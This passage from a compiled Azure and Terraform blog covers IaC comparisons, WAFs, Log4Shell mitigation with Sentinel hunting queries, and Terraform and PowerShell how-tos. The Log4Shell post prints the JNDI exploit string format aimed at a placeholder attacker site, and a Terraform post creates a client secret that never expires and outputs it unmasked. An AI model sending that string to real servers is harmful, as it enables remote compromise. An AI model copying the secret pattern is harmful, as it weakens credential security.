**Pro's:** - Flexibility: PowerShell will interact with Azure, on-premises services, and third-party APIs. - Familiarity: Many IT teams already possess PowerShell skills. - Granular Control: Offers precise control over resource configurations. **Con's:** - No Declarative Syntax: PowerShell scripts describe step-by-step processes rather than desired end states, making it harder to ensure consistency in deployments. - Complex Deployments: Managing large-scale infrastructure becomes challenging compared to other IaC tools. **Use Case:** - Small-scale deployments or one-off configurations. - Teams with strong PowerShell expertise. - Automating workflows alongside IaC tools. ------ ### Azure Resource Manager (ARM) Templates [What is ARM? - Azure Resource Manager | Microsoft Learn](https://learn.microsoft.com/en-us/azure/azure-resource-manager/templates/overview) ARM templates are JSON-based, declarative files that define Azure resource configurations. It is Microsoft’s original native IaC solution and specifically designed to work with Azure.

Code snippet - ARM template to deploy a VM

**Pro's:** - **Azure Native:** Integrated with Azure, ensuring compatibility and support for all the latest Azure services, ARM is what the GUI experience uses in the background. - **Declarative Syntax:** Ensures deployments are consistent and repeatable every time. - **Comprehensive:** Supports complex dependencies and advanced configurations. **Con's:** - **Verbose Syntax:** JSON can become unwieldy and difficult to manage for large deployments. - **Steep Learning Curve:** Debugging and error handling can be time-consuming, love finding indent mistakes? - **Limited Reusability:** Modularization is less straightforward compared to other tools. **Use Case:** - Enterprises deeply invested in Azure. - Deployments requiring fine-grained configurations and advanced dependency handling. ------ ### Bicep [What is Bicep? - Azure Resource Manager | Microsoft Learn](https://learn.microsoft.com/en-us/azure/azure-resource-manager/bicep/overview?tabs=bicep) Bicep is the latest IaC tool from Microsoft, It’s infinitely more user-friendly and human readable than ARM. Bicep is a domain specific language (DSL) for Azure that simplifies the authoring of ARM templates and brings it closer to 3rd party tools like Terraform and CloudFormation.

Code snippet - Bicep template to deploy a VM

**Pro's:** - **Simplified Syntax:** Easier for real-world people to read compared to ARM templates. - **Azure Native:** Translates directly to ARM templates when deployed, ensuring full compatibility with the latest Azure resources. - **Reusable Modules:** Works great when used in modules for repeatable structured deployments. - **Integrated Tooling:** Integrates with Azure CLI and Visual Studio Code. - **Planning:** Supports 'What if' deployments for planning deployments. **Con's:** - **Azure Specific:** Not suitable for managing resources outside Azure. - **ARM Limitations:** Inherits challenges like debugging from ARM templates. **Use Case:** - Teams looking for a modern, Azure-native IaC tool. - Organizations already using ARM templates but seeking a more streamlined approach. ------ ### Terraform [What is Terraform | Terraform | HashiCorp Developer](https://developer.hashicorp.com/terraform/intro) Terraform is a IaC tool that supports deploy and configuration of infrastructure across multiple providers, both on-premises and cloud including; Azure, AWS, GCP, VMWare and FortiGate. As HashiCorp work directly with partners and they now support over 4800 providers across more than 250 vendors all using the same language: HashiCorp Configuration Language (HCL).

Code snippet - Terraform to deploy a VM

**Pro's:** - **Multi-Everything Support:** Ideal for managing resources across different platforms; Public/Private cloud or on-premises. - **Modularity:** Excels with module support. - **Active Community:** Extensive documentation and plugin ecosystem. - Terraform Registry - **State Management:** Tracks infrastructure state, enabling incremental updates with full planning before deployment. **Con's:** - **Learning Curve:** HCL differs from ARM but teams using ARM should be able to adapt. - **State File:** Collaboration can be tricky without proper processes in place, consider splitting state files where possible. - **Lagging Azure Features:** May not support the latest Azure features as quickly as native tools as HashiCorp need the API from Azure to be exposed. **Use Case:** - Multi-cloud or hybrid cloud environments. - Organizations prioritizing modularity and version control. - Teams with a strong DevOps focus. ------ ### What to consider when choosing? When choosing the businesses approach to IaC for Azure, make sure to factor in the following: 1. **Your Environment:** If your infrastructure is purely Azure-based, Bicep or ARM templates may be good enough. For multi-cloud setups or setups that require configuration of more than just the base resource, Terraform is the better choice. 2. **Team Skills:** Make use of the skills your team already has, there's no point trying to reinvent the wheel. If they’re familiar with PowerShell, it could be an easier starting point. 3. **Complexity:** For complex deployments, tools like Bicep and Terraform offer better management and module support than PowerShell or ARM templates. 4. **Future:** Think about scalability and what could happen in the future. Nothing's truly future proof but Terraform’s modular approach and multi-cloud support make a good case for it. 5. **Integration:** How does the tool fit into your existing CI/CD pipelines or deployment process. ------ ### Final Thoughts I personally prefer Terraform for its multi-cloud support and the transferable skill it offers. However the right choice depends on the makeup of the team you have and your aspirations for the future. PowerShell gives you the ease of use and quick start, ARM templates provide full Azure support, Bicep simplifies ARM and Terraform delivers the versatility of multi-everything. Start by understanding the business requirements, then you should easily be able to select the tool that best works for your cloud strategy and team. Which IaC tool are you using for Azure? Share your experiences and insights in the comments below! --- # Why-aC | Why infrastructure as code? - URL: https://blog.l-w.tech/blog/2025-01-22-TF-Why-aC - Date: 2025-01-22 - Author: Elliott Leighton-Woodruff - Tags: Azure, AWS, Google Cloud, Terraform, Bicep, IaC, DevOps, Automation, Infrastructure, Cloud Computing Why Infrastructure as Code delivers reliability, speed, and auditing for cloud platforms. Most companies today are already using some elements of cloud computing—whether that’s through a trusted partner, a service, or directly with one of the major cloud providers like Azure, AWS, or Google Cloud. However, despite this very few are leveraging 'Infrastructure as Code' (IaC). IaC was once seen as a gold standard of platform management, something only accessible to the largest enterprises with deep pockets and large developer teams dedicated to managing sprawling infrastructure. This perception was largely true in the early days when tools were complex and difficult to master. However, things changed with tools like Azure Resource Manager Templates (ARM), later evolving to Bicep and 3rd party tools like Terraform becoming commonplace. Today we find the landscape different, IaC is easily reachable for most if not all customers and yet the uptake still isn't really there. So why should we bother and what's the value add that IaC can provide all businesses? ## Why the Gap? The barrier to entry these days is incredibly low, you can start a free trial in Azure, get yourself setup with Terraform or Bicep and start deploying low or even zero cost resources to learn the ropes. So why are companies not making this start? For most I've spoken with each has a common theme: lack of awareness, perception of complexity, an internal standard that is seen to be 'good because it works' or my favourite ‘I like ClickOps’ (the art of using a GUI). But by standing on the side-lines businesses are missing huge benefits that could be realised quickly that could change the way they manage and scale their platform moving forward. ## Why bother with IaC? Where's the value? 1. **Reliability** With IaC as a business you can define your infrastructure as code. This in the simplest of terms means that your business can define the resiliency you require from a service and ensure that there is no deviation reducing the chances of human error. Heard about all those people publicly exposing S3 buckets in AWS or blob storage in Azure?... 2. **Speed** Deploying infrastructure through ClickOps is slow, click next>next>next and reviewing each step to make sure you don’t make a mistake. Not so bad when you are deploying a single storage account, far worse when you need to roll out multiple resources across multiple environments (dev|test|uat|stage|prod). Rolling a service out in hours sounds a lot better than days right? Sure there’s a cost to creating all this but targeting the repeated deployments is where you’ll speed things up dramatically. 3. **Auditing** Just like application developers, IaC can be managed (and should be!) with git. That means that all updates to code can be reviewed, tracked with a full history of changes. Made a mistake? Roll back to the last known working version, done. Need to know who exposed an API key externally? Review the git commit history, done. 4. **Cost management** Everyone’s favourite… With IaC you can provision and de-provision at will, even on a schedule. This reduces the risk of overprovisioning infrastructure that push up costs. Additionally with modules (a topic I’ll cover in the future) we can bake in guardrails to prevent any infrastructure being delivered other than what we want, keeping the risk of that £16,000pcm NV-series VM being deployed at bay. 5. **Scalability** Whether it's scaling up to handle peak demand through your busiest period, deploying a new environment for your developers or rolling out a new platform as part of a merger or acquisition IaC makes these tasks simple, compliant and repeatable. 6. **Disaster recovery** Now this doesn’t suit everyone but if you can get to a place where everything is as-code you can recreate an environment quickly in the event of failure. Mixing IaC in with data replication to other regions or even cloud providers is a fantastic way of protecting your business in the event of a disaster and could help you on your way to delivering a fully robust business continuity plan. ## Take-aways The tools and skills needed to leverage IaC within your company are already in reach, what’s often missing is a shift in mindset and a willingness to invest the time to learn and develop but doing so will allow your business to reap the benefits long term. As the cloud providers continue to develop new tools and businesses pivot to become more tech-focused those that embrace automation and standardisation will be better positioned to innovate, scale and respond to the changing landscape. Those that don’t will be wasting time, effort and potentially monthly consumption… So, why should you bother with IaC? Really the question should be: Can you afford not to? ``` --- # The Importance of Using Web Application Firewalls in Azure - URL: https://blog.l-w.tech/blog/2023-01-06-WAF-in-Azure - Date: 2023-01-06 - Author: Elliott Leighton-Woodruff - Tags: Azure, Security, Attack, Application Protect Azure applications from SQL injection and XSS attacks with Web Application Firewalls. As businesses continue to shift their operations to the cloud, it's important to ensure that their applications and data are protected from threats such as cyber attacks and data breaches. One way to do this is by implementing a web application firewall (WAF) on an application gateway in Azure. A WAF is a security solution that sits between a website or web application and the internet, and is designed to protect against common web-based attacks such as SQL injection, cross-site scripting (XSS), and parameter tampering. These types of attacks can be used to steal sensitive data, deface websites, and even take control of entire systems. A WAF analyzes incoming traffic and blocks malicious requests before they can reach the application, thereby providing an additional layer of security for your application. When deployed on an application gateway in Azure, a WAF can provide protection for multiple web-based applications running on the same gateway. This is particularly useful for businesses that have multiple applications hosted on Azure and want to ensure that all of them are secure. ## How a WAF Works A WAF works by inspecting incoming traffic and identifying patterns that are indicative of malicious activity. This can include analyzing the content of the request, the headers, and the source IP address. If the WAF determines that a request is malicious, it will block it before it can reach the application. There are two main types of WAFs: rule-based and machine learning-based. Rule-based WAFs use a set of pre-defined rules to identify and block malicious traffic. These rules are based on known attack patterns and can be updated as new threats are discovered. Machine learning-based WAFs, on the other hand, use artificial intelligence and machine learning algorithms to learn the patterns of normal traffic and identify anomalies that may indicate a threat. ## Benefits of Using a WAF on an Application Gateway in Azure **Improved security**: As mentioned, a WAF can block common web-based attacks, helping to protect your applications and data from being compromised. This is particularly important for businesses that handle sensitive data, such as financial or personal information. **Compliance**: Many regulatory standards, such as PCI DSS and HIPAA, require the use of WAFs to ensure the security of sensitive data. By implementing a WAF on an application gateway in Azure, you can help ensure compliance with these regulations. **Better performance**: A WAF can help improve the performance of your applications by blocking malicious traffic and allowing legitimate traffic to pass through more quickly. This can help reduce the risk of attacks, such as distributed denial of service (DDoS) attacks, which can slow down or even take down your applications. **Scalability**: An application gateway in Azure is highly scalable, meaning it can easily handle a large number of requests without affecting performance. When combined with a WAF, the application gateway can provide protection for a large number of web-based applications, making it a cost-effective security solution. ## Conclusion In summary, using a web application firewall (WAF) on an application gateway in Azure can provide an additional layer of security for your web-based applications, help ensure compliance with regulatory standards, improve performance, and provide scalability. It's an important security consideration for businesses that have applications hosted on Azure. Don't leave your applications and data vulnerable to attacks --- # Azure Sentinel - Log4J - URL: https://blog.l-w.tech/blog/2021-12-15-Azure-Sentinel-log4j - Date: 2021-12-15 - Author: Elliott Leighton-Woodruff - Tags: Azure, Sentinel, Log4J, CVE Detect and mitigate Log4Shell (CVE-2021-44228) vulnerabilities using Azure Sentinel. ## Intro Apache Log4j is a Java-based logging utility that has recently had a zero-day exploit released codenamed "Log4Shell" (CVE-2021-44228). This zero-day allows an attacker to execute code on the remote server (Remote Code Execution) and can allow an attacker the ability to fully compromise the server the service is running on.
## Why is this a problem? The log4J package uses a JNDILookup plugin to allow the application/service to search for data throughout a Java directory and is found on all platforms running Java+logging from version 2.0-beta9 to 2.15.0. This has affected major platforms such as Google, Youtube, Facebook, Twitter, and many more due to how widespread the solution is used. This ability to execute remote code allows an attacker, with very limited effort, to gain access to the underlying asset and access to the CLI enabling them to launch applications, make changes to files and even download software. I won't post how the attack itself is completed here, however, at a high level it requires the attacker to host a site and send the following string format to gain access: ``` ${jndi:ldap://[attacker site]/a} ```
## Ok I'm worried, what can I do? The vulnerability has been patched in version 2.16.0 so the safest option will be to upgrade Log4j to the latest version or at least to 2.16.0, you can find the link [**here**](https://logging.apache.org/log4j/2.x/download.html) Alternatively, if upgrading is not an option you can mitigate the risk with the following workarounds: Update property (does not mitigate risks in "non-default configurations" - see [**CVE-2021-45046**](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046)): ``` log4j2.formatMsgNoLookups=true ``` Or remove the JNDILookup from the log4j-core: ``` zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class ```
## How can I investigate the issue with Sentinel? It should go without saying but to protect against any zero-day one of the first and best steps you can take is patching, regardless of how big of a task it may seem patching will provide you with additional security that you otherwise would not be able to gain from simply applying workarounds. But let's say you are now fully patched, you're confident that you've not been compromised but how can you really tell? Microsoft have released some great new detection methods including Microsoft 365, Cloud and IoT Defender definitions, Azure Firewall Premium IDPS (Intrusion Detection and Prevention System) rules, and Web Application Firewall (WAF) default ruleset The big-ticket item though is the advanced hunting query for Sentinel, providing you have Microsoft 365 Defender/Cloud already deployed in your environment you can now run the following to see if a service has been compromised, don't forget just because you've not seen any outage or action doesn't mean your environment has not been breached.
### Malicious Indicators in Cloud Application Events Return the IP address, Payload string and Download URL of the attacker: ``` CloudAppEvents | where Timestamp > datetime("2021-12-01") | where UserAgent contains "jndi:" or Application contains "jndi:" or AdditionalFields contains "jndi:" or AccountDisplayName contains "jndi:" | project ActionType, AccountDisplayName, IPAddress, UserAgent, AdditionalFields, ActivityType, Application ```
### Vulnerable applications via Threat and Vulnerability Management Search for potentially still vulnerable applications: ``` DeviceTvmSoftwareInventory | where SoftwareName contains "log4" | project DeviceName, SoftwareName, SoftwareVersion ``` You can read more about Microsofts response to preventing, detecting, and hunting for CVE-2021-44228 [**here**](https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/) --- # Why Terraform? - URL: https://blog.l-w.tech/blog/2021-03-06-Why-Terraform - Date: 2021-03-06 - Author: Elliott Leighton-Woodruff - Tags: Azure, ARM, Terraform, IaC Discover why Terraform outshines ARM templates for Azure infrastructure deployments. ## Intro I'm often asked if Microsoft provides the ability the deploy resources into Azure using Azure Resource Manager templates (ARM Templates) then why would I use Terraform for CI/CD deployments? In this post, I'll try to answer this and provide an understanding of the differences and why, in my opinion, Terraform is the most versatile and agile tool available for IaC deployments.

## Why Infrastructure as code? Anyone who’s spent anytime deploying to Azure knows that the user interface is intuitive and that it guides you through the creation of deploying resources really well, prompting you for missing information and providing handy tooltips. Using the portal can, however, lead to human error and doesn’t lend itself to deploying at scale or redeploying the same resources over and over. IaC allows organizations to capture infrastructure or application requirements in code allowing for redeployment, deployment at scale and can ensure that all resources are deployed using the correct standards. The largest benefit to investing in IaC is the time saving it offers giving organizations the ability to spin up vast environments with little configuration.

## What are ARM templates? ARM templates are Microsoft’s answer to IaC and contain all the parameters required to deploy a given resource. When deployed via Cloudshell or Powershell templates are able to create resource objects automatically without the need to be manually deployed through the portal. ARM templates use JSON files typically referencing a variables file. The below is an example of an ARM template used to deploy a storage account: ``` { "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", "contentVersion": "1.0.0.0", "parameters": { "storageAccountType": { "type": "string", "defaultValue": "Standard_LRS", "allowedValues": [ "Standard_LRS", "Standard_GRS", "Standard_ZRS", "Premium_LRS" ], "metadata": { "description": "Storage Account type" } }, "location": { "type": "string", "defaultValue": "[resourceGroup().location]", "metadata": { "description": "Location for all resources." } } }, "variables": { "storageAccountName": "[concat('store', uniquestring(resourceGroup().id))]" }, "resources": [ { "type": "Microsoft.Storage/storageAccounts", "apiVersion": "2019-06-01", "name": "[variables('storageAccountName')]", "location": "[parameters('location')]", "sku": { "name": "[parameters('storageAccountType')]" }, "kind": "StorageV2", "properties": {} } ], "outputs": { "storageAccountName": { "type": "string", "value": "[variables('storageAccountName')]" } } } ```
#### Pros - Native to Azure - Always up to date and in sync with new services launched - Can be used directly from the Azure portal via “Template Deployment” deployed or via Cloudshell/Powershell - Can be provided to other users for easy deployment – for example, if offered to support a service. - Can be deployed by CI/CD services such as Azure DevOps #### Cons - Larger, more complex code required adding to potential human error - Does not hold any state information - Cannot reference data from the deployment - Does not support other platforms
More Info on ARM templates can be found [Here](https://docs.microsoft.com/en-us/azure/azure-resource-manager/templates/overview)

## What is Terraform? Terraform uses HashiCorp Configuration Language (HCL) that allows organizations to define environments across over 200 providers covering both on-premises and cloud technologies such as Azure, AWS, G Cloud, and VMWare vSphere. HCL is a simple human-readable language that minimizes the code required for a given deployment relying on standardized blocks known as “Resource Blocks”. Terraform utilizes a state file that keeps detailed information of previous deployments, allowing for data references from other resources. This feature further enables teams to utilize less code focusing on speed and accuracy. Terraform’s configuration elements are stored within .tf files and typically reference variable files using .tfvars files. The below is an example of a Terraform template used to deploy a storage account: ``` resource "azurerm_storage_account" "example" { count = 1 name = "storageaccountname${count.index}" resource_group_name = azurerm_resource_group.example.name location = azurerm_resource_group.example.location account_tier = "Standard" account_replication_type = "GRS" tags = { environment = "staging" } } ```
#### Pros - Supports over 200 deployment types - Minimizes code required - Holds a state file that can be read from by other resources - Provides a hugely scalable solution - Can be deployed by CI/CD services such as Azure DevOps #### Cons - Relies on Azure Resource Manager API's - Lags behind ARM templates as updates to ARM API’s are slower than the release of services - Cannot be deployed directly from the Azure portal - Requires additional tooling/configuration initially
More Info on Terraform can be found [Here](https://www.terraform.io/)

## Conclusion ARM templates provide a great way to deploy services into Azure using native tools that will almost always be up to date but lacks in areas such as multi-cloud, hyper-scale deployments, or code minimization. As such it is best used for smaller-scale deployments or where a service is going to be offered to external users such as via the Azure marketplace or GitHub. Given that Terraforms code is much smaller, more flexible, easier to manage, and can cover multi-cloud and even on-premises solutions it is my preferred deployment tool giving me the ability to provide my customers with an IaC solution that can fit almost every requirement. It is however a personal and business decision, so I would recommend you review your requirements, consider future changes to that, and base your own decisions based on the outcome of these.

## Project Bicep Whilst Terraform is my personal choice today, Project Bicep is currently within its development stages and is aiming to reduce the code complexity of ARM using Domain Specific Language (DSL) for deploying Azure resources declaratively. As this service matures there is every chance that the benefits could outweigh the fact it is platform-specific, and I’ll review this over time. If you’d like to take a look at Azure Bicep's current progress [Click Here](https://github.com/Azure/bicep) --- # Create enterprise applications for external access using Terraform - URL: https://blog.l-w.tech/blog/2021-01-08-Create-Enterprise-Application-For-External-Access - Date: 2021-01-08 - Author: Elliott Leighton-Woodruff - Tags: Azure, Terraform Automate Azure Enterprise Application creation with Terraform for secure third-party access. 3rd party services such as threat management tools for Azure can add incredible value but to access services, they need a secure way of connecting to the platform. Enterprise Application give full IAM (Identity and Access Management) control and can be used to provide granular access to services. During deployment I found a need to automate the following elements: - Registration of application within Azure with customized API permissions - Creation of Enterprise application (Service Principal) linked to application - Creation of client secret with no expiry date - Creation of custom RBAC - Assign app to subscriptions using custom RBAC role To make sure this process was repeatable easily and at scale the following Terraform elements were used. ### Create application registration ``` #### #App Registration #### resource "azuread_application" "example" { name = "Example-App" homepage = "https://blog.l-w.tech" oauth2_allow_implicit_flow = false oauth2_permissions = [] owners = [ data.azurerm_client_config.current.object_id ] required_resource_access { resource_app_id = "00000003-0000-0000-c000-000000000000" resource_access { id = "e1fe6dd8-ba31-4d61-89e7-88639da4683d" type = "Scope" } resource_access { id = "9a5d68dd-52b0-4cc2-bd40-abcf44ac3a30" type = "Role" } resource_access { id = "5b567255-7703-4780-807c-7be8301ae99b" type = "Role" } resource_access { id = "df021288-bdef-4463-88db-98f22de89214" type = "Role" } resource_access { id = "483bed4a-2ad3-4361-a73b-c83ccdbdc53c" type = "Role" } } } ``` ### Create Service Principal ``` #### #Service Principal #### resource "azuread_service_principal" "example" { application_id = azuread_application.example.application_id app_role_assignment_required = false tags = [ "AppServiceIntegratedApp", "WindowsAzureActiveDirectoryIntegratedApp", ] } ``` ### Create client secret without expiry ``` #### #Client Secret #### resource "random_password" "examplesecret" { count = 1 length = 32 special = true override_special = "_%@" } resource "azuread_application_password" "example" { application_object_id = azuread_application.example.id description = "example Secret" value = random_password.examplesecret[0].result end_date = "2299-12-31T00:00:00Z" depends_on = [ random_password.examplesecret, azuread_application.example ] } ``` ### Custom RBAC and assignment Now that the app has been registered and has a basic level of access to the tenant additional access is required to ensure the 3rd party service can read resource objects that are deployed. This involves creating both a Azure RBAC policy and then an assignment for each subscription required. ``` #### # RBAC Role #### resource "azurerm_role_definition" "example-rd" { name = "Example RBAC" scope = "/subscriptions/00000000-0000-0000-0000-000000000000" description = "Grants minimal set of 'read' permissions to enable discovery of resources by Example-App" permissions { actions = [ "Microsoft.Authorization/permissions/read", "Microsoft.Compute/virtualMachines/read", "Microsoft.Compute/virtualMachineScaleSets/read", "Microsoft.Compute/virtualMachineScaleSets/virtualMachines/*/read", "Microsoft.Network/networkInterfaces/read", "Microsoft.Network/publicIPAddresses/read", "Microsoft.Network/virtualNetworks/read", "Microsoft.Network/virtualNetworks/subnets/read", "Microsoft.Network/virtualNetworks/subnets/virtualMachines/read", "Microsoft.Network/virtualNetworks/virtualMachines/read", "Microsoft.Resources/subscriptions/locations/read", "Microsoft.Resources/subscriptions/resourceGroups/read", "Microsoft.Authorization/policyAssignments/read", "Microsoft.Authorization/roleAssignments/read", "Microsoft.Authorization/roleDefinitions/read", "Microsoft.Network/networkSecurityGroups/read", "Microsoft.Network/networkWatchers/read", "Microsoft.Network/networkWatchers/queryFlowLogStatus/action", "Microsoft.Sql/servers/administrators/read", "Microsoft.Sql/servers/auditingSettings/read", "Microsoft.Sql/servers/databases/read", "Microsoft.Sql/servers/databases/auditingSettings/read", "Microsoft.Sql/servers/databases/replicationLinks/read", "Microsoft.Sql/servers/databases/securityAlertPolicies/read", "Microsoft.Sql/servers/databases/transparentDataEncryption/read", "Microsoft.Sql/servers/encryptionProtector/read", "Microsoft.Sql/servers/firewallRules/read", "Microsoft.Sql/servers/read", "Microsoft.Sql/servers/securityAlertPolicies/read", "Microsoft.DBforMySQL/servers/read", "Microsoft.DBforMySQL/servers/configurations/read", "Microsoft.DBforPostgreSQL/servers/read", "Microsoft.DBforPostgreSQL/servers/configurations/read", "Microsoft.DBforMariaDB/servers/read", "Microsoft.DBforMariaDB/servers/configurations/read", "Microsoft.Web/sites/read", "Microsoft.Web/sites/*/read", "Microsoft.Web/sites/config/list/Action", "Microsoft.Web/sites/config/Read", "Microsoft.Insights/logprofiles/read", "Microsoft.Insights/ActivityLogAlerts/Read", "Microsoft.Compute/disks/read", "Microsoft.ContainerService/managedClusters/read", "Microsoft.KeyVault/vaults/read", "Microsoft.KeyVault/vaults/secrets/read", "Microsoft.Storage/storageAccounts/read", "Microsoft.Storage/storageAccounts/blobServices/containers/read", "Microsoft.Security/securityContacts/read", "Microsoft.Security/pricings/read", "Microsoft.Security/settings/read" ] not_actions = [] } assignable_scopes = [ "/subscriptions/00000000-0000-0000-0000-000000000000" ] } #### #Assignment #### resource "azurerm_role_assignment" "example-ra" { scope = "/subscriptions/00000000-0000-0000-0000-000000000000" role_definition_name = "Example RBAC" principal_id = azuread_service_principal.example.id depends_on = [ azurerm_role_definition.example-rd ] } ``` Finally its possible to have all key data exported on completion by using the following: ``` output "Example_App_TenantID" { value = data.azurerm_client_config.current.tenant_id } output "Example_App_AppID" { value = azuread_application.example.application_id } output "Example_App_Secret" { value = azuread_application_password.example.value } ``` --- # Deploy VM from Azure Marketplace image using Terraform - URL: https://blog.l-w.tech/blog/2021-01-05-deploy-vm-azuremarketplace-terraform - Date: 2021-01-05 - Author: Elliott Leighton-Woodruff - Tags: Azure, Terraform Deploy Azure Marketplace images with Terraform using publisher, offer, SKU, and version IDs. During code deployment via terraform to Azure, it's useful to be able to reference marketplace-based images to support the deployment of 3rd party services. This brief guide will cover how to find an image and then how to use that data to deploy, in this case, an AlertLogic Linux VM. Windows images can be found in the same manner. For the purpose of this example, I will deploy *Alert Logic Professional - BYOL*. This can be found within the Azure marketplace. ![AlertLogic Professional Marketplace Image](https://stlwtechwebimages.blob.core.windows.net/images/alertlogicproffesionalmarketplacescreenshot.png) In order to deploy this image, we must first obtain the following IDs: *Offer, Publisher, SKU, and Version*. This can be done once connected to the Azure cloud shell using the following command: ``` az vm image list --output table --all --publisher AlertLogic ``` ![AlertLogic Professional Marketplace Cloud Shell Export](https://stlwtechwebimages.blob.core.windows.net/images/alertlogicproffesionalmarketplaceimagecloudshell.png) Once we have this detail we can now use these elements to build out the storage_image_reference and plan blocks: ``` storage_image_reference { publisher = "alertlogic" offer = "alert-logic-tm" sku = "20215000100-tmpbyol" version = "latest" } plan { name = "20215000100-tmpbyol" publisher = "alertlogic" product = "alert-logic-tm" } ``` These blocks when used within azurerm_virtual_machine will fully deploy the template with more customization than the portal and even at scale. Below is a full example of this resource as a whole (note that this relies on existing variables and resources): ``` #### #resource group #### resource "azurerm_resource_group" "hub_alertlogic" { name = "${var.resource_prefix}-ALERTLOG-rg" location = var.location tags = var.tags } #### #virtual network adapter #### resource "azurerm_network_interface" "hub_alertlogic_vm_nic" { count = 1 name = "${var.spoke1_VM_resource_prefix}-ALERTLOG${count.index + 1}-nic" location = azurerm_resource_group.hub_alertlogic.location resource_group_name = azurerm_resource_group.hub_alertlogic.name tags = var.tags ip_configuration { name = "ipconfig1" subnet_id = azurerm_subnet.hub_services_sn.id private_ip_address_allocation = "Dynamic" } } #### #virtual machine #### resource "azurerm_virtual_machine" "hub_alertlogic_vm" { count = 1 name = "${var.spoke1_VM_resource_prefix}-ALERTLOG${count.index + 1}" resource_group_name = azurerm_resource_group.hub_alertlogic.name location = azurerm_resource_group.hub_alertlogic.location vm_size = "Standard_F4s_v2" network_interface_ids = [azurerm_network_interface.hub_alertlogic_vm_nic[count.index].id] storage_image_reference { publisher = "alertlogic" offer = "alert-logic-tm" sku = "20215000100-tmpbyol" version = "latest" } plan { name = "20215000100-tmpbyol" publisher = "alertlogic" product = "alert-logic-tm" } storage_os_disk { name = "${var.spoke1_VM_resource_prefix}-ALERTLOG${count.index + 1}-osdisk" caching = "ReadWrite" create_option = "FromImage" managed_disk_type = "Premium_LRS" } os_profile { computer_name = "${var.spoke1_VM_resource_prefix}-ALERTLOG${count.index + 1}" admin_username = var.username admin_password = var.password } os_profile_linux_config { disable_password_authentication = false } tags = var.tags } ``` Finally before deployment of a marketplace image with an associated plan can be completed the following powershell command needs to ran in order to accept the terms: ``` $Publisher = "alertlogic" $Product = "alert-logic-tm" $Name = "20215000100-tmpbyol" Get-AzureRmMarketplaceTerms -Publisher $Publisher -Product $Product -Name $Name | Set-AzureRmMarketplaceTerms -Accept ``` --- # Azure to Azure Migration - URL: https://blog.l-w.tech/blog/2021-01-04-Azure-to-Azure-Migration - Date: 2021-01-04 - Author: Elliott Leighton-Woodruff - Tags: Azure, Powershell Migrate Azure resources across tenants using MigAZ for mergers and acquisitions. Due to mergers, acquisitions or sale it’s likely that companies develop a need to migrate key services from platform to platform. Although it is currently possible to migrate resources between subscriptions it is not possible to migrate across tenants natively. The below covers the steps required to migrate tenant to tenant using MigAZ a community tool availble from GitHub (covering ARM to ARM migration) https://github.com/Azure/migAz ### Pre-reqs Windows 8 or higer Latest PowerShell AzureRM module Install-Module -Name AzureRM -AllowClobber Import-Module -Name AzureRM Separate "Owner" role accounts for both tenants The resource being migrated should be powered off & any active connections removed Disk encryption using ADE v1.1 will fail migration, in order to remove the encryption please visit the following post: Remove ADE ### Getting started After downloading the aplpication launch MigAZ.exe and you will be greated by the following console: ![MigAZ Console](https://stlwtechwebimages.blob.core.windows.net/images/azure-to-azure-migration1.png) From here click "Change" on the left side to enter your login credentials for the SOURCE tenant, then complete the same on the right side making sure to use seperate accounts this time for the TARGET tenant. During log you will be prompted to choose the tenant & subsciption, ensure you select the correct enviroments or your migration will fail or worse you could migrate to the wrong tenant! ![MigAZ Console](https://stlwtechwebimages.blob.core.windows.net/images/azure-to-azure-migration2.png) From here you can select the resources required for migration, be sure to correct and errors or warnings. Finally, export the files required and an HTML file will be generated with the next steps, copy this data into a PowerShell session currently logged into Azure using Connect-AzureRMAccount: ![MigAZ Output](https://stlwtechwebimages.blob.core.windows.net/images/azure-to-azure-migration3.png) Allow the script to run for some time it will continue to refresh to provide an up to date transfer count. Once completed your VM will be migrated to your new tenant and powered on waiting for you. --- # Removing ADE v1.1 - URL: https://blog.l-w.tech/blog/2021-01-04-Removing-ADE-v1.1 - Date: 2021-01-04 - Author: Elliott Leighton-Woodruff - Tags: Azure, Virtual Machines, Powershell Remove Azure Disk Encryption v1.1 from VMs for migration and modification scenarios. Azure Disk Encryption leverages BitLocker to provide full disk encryption on Azure virtual machines running Windows. This solution is integrated with Azure Key Vault to manage disk encryption keys and secrets in your key vault subscription. There are two versions of extension schema for Azure Disk Encryption (ADE): - v2.2 - A newer recommended schema that does not use Azure Active Directory (AAD) properties. - v1.1 - An older schema that requires Azure Active Directory (AAD) properties. Under certian conditions, such as migration, v1.1 encryption needs to be removed and then later reinstated using v1.2. The below script removes this encryption readying the server for migration or modification: ``` $VMName = "Virtual-Machine-Name" $VM = Get-AzVM -Name $VMName #View Current Disk Encryption Get-AzVmDiskEncryptionStatus -ResourceGroupName $VM.ResourceGroupName -VMName $VM.Name #Remove Disk Encryption Disable-AzVMDiskEncryption -ResourceGroupName $VM.ResourceGroupName -VMName $VM.Name ``` --- # Configuring a Routable Domain - URL: https://blog.l-w.tech/blog/2020-12-17-Configure-Routable-Domain - Date: 2020-12-17 - Author: Elliott Leighton-Woodruff - Tags: Azure, Active Directory, Office 365, Powershell Configure routable domain suffixes for Azure AD Connect and Office 365 migration success. Clients wishing to migrate to Office365 will usually utilise Azure Active Directory Connect to form part of the migration, this will synchronise Active Directory to Azure to be used throughout the Office365 suite. Previously it was best practise to append domain names with .local or similar as routable domains were not previously required. Synchronising users with non-routable suffix's will fail generating alerts and the users will not be synchronised. Prior to migration its possible to highlight the risk using Microsoft's IDFix tool found here. In order to amend the current domain the following steps should be taken: ### Add a new UPN suffix - Open Active Directory Domains and Trusts  - Right click the root > Properties - Add routable domain suffix (E.g - l-w.tech) ### Change UPN Suffix for users** The following PowerShell command will edit all user account withing the specified OU with the new UPN suffix: ``` ### #Replace edgeitc.local and l-w.tech ### $OUUsers = Get-ADUser -SearchBase "OU=FirstOU,OU=RootOU,DC=edgeitc,DC=local" -Filter {UserPrincipalName -like '*edgeitc.local'} -Properties userPrincipalName -ResultSetSize $null $OUUsers | foreach {$UPNUpdate = $_.UserPrincipalName.Replace("edgeitc.local","l-w.tech"); $_ | Set-ADUser -UserPrincipalName $UPNUpdate} ``` --- # Rename Azure VM with Powershell - URL: https://blog.l-w.tech/blog/2020-12-15-Rename-Azure-VM - Date: 2020-12-15 - Author: 